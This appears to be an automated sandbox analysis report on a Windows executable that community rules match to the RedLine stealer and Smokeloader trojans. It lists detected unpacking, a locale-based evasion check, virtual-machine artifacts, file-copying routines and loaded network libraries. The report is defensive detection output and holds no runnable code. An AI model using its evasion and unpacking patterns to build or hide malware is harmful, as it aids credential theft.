                      Source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0487F4FF0_2_0487F4FF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0487159F0_2_0487159F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489A5FF0_2_0489A5FF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048836EF0_2_048836EF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048CA76F0_2_048CA76F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048BA08F0_2_048BA08F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048A80400_2_048A8040
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AA19F0_2_048AA19F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489B1CF0_2_0489B1CF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048711DF0_2_048711DF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048882DF0_2_048882DF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B134F0_2_048B134F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B5C000_2_048B5C00
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489AD0F0_2_0489AD0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AED3D0_2_048AED3D
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AFFEF0_2_048AFFEF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048BC8050_2_048BC805
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0486D9AB0_2_0486D9AB
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B9AAF0_2_048B9AAF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048ACA0F0_2_048ACA0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04883A0F0_2_04883A0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04885B2F0_2_04885B2F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048C8B640_2_048C8B64
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: String function: 00404610 appears 317 times
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                      Source: lxEu3xfjIb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: lxEu3xfjIb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Y3JRHVM0.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3086a13-7b52-44cc-b9c5-e403a51bfe22Jump to behavior
                      Source: lxEu3xfjIb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\lxEu3xfjIb.exe "C:\Users\user\Desktop\lxEu3xfjIb.exe"
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeUnpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeUnpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_02C25A3D push 7D7C6160h; retf 0_2_02C25A42
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_02C233F4 push cs; retn 0002h0_2_02C2340E
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_02C2310D push cs; retn 0002h0_2_02C2310E
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_02C23117 push cs; retn 0002h0_2_02C23126
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0485B59C push ecx; ret 0_2_0485B5AF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048C9280 push ecx; ret 0_2_048C9293
                      Source: lxEu3xfjIb.exeStatic PE information: section name: .text entropy: 7.84625610084164
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-46059
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeEvaded block: after key decisiongraph_0-47220
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeAPI coverage: 6.3 %
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0484E797
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0484F087
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0484C0A7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0484E177
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_04854357
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04854DC7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0484DDE7
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04853D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_04853D67
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04841977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04841977
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0484FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0484FA17
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04854A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_04854A27
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.4.drBinary or memory string: VMware
                      Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
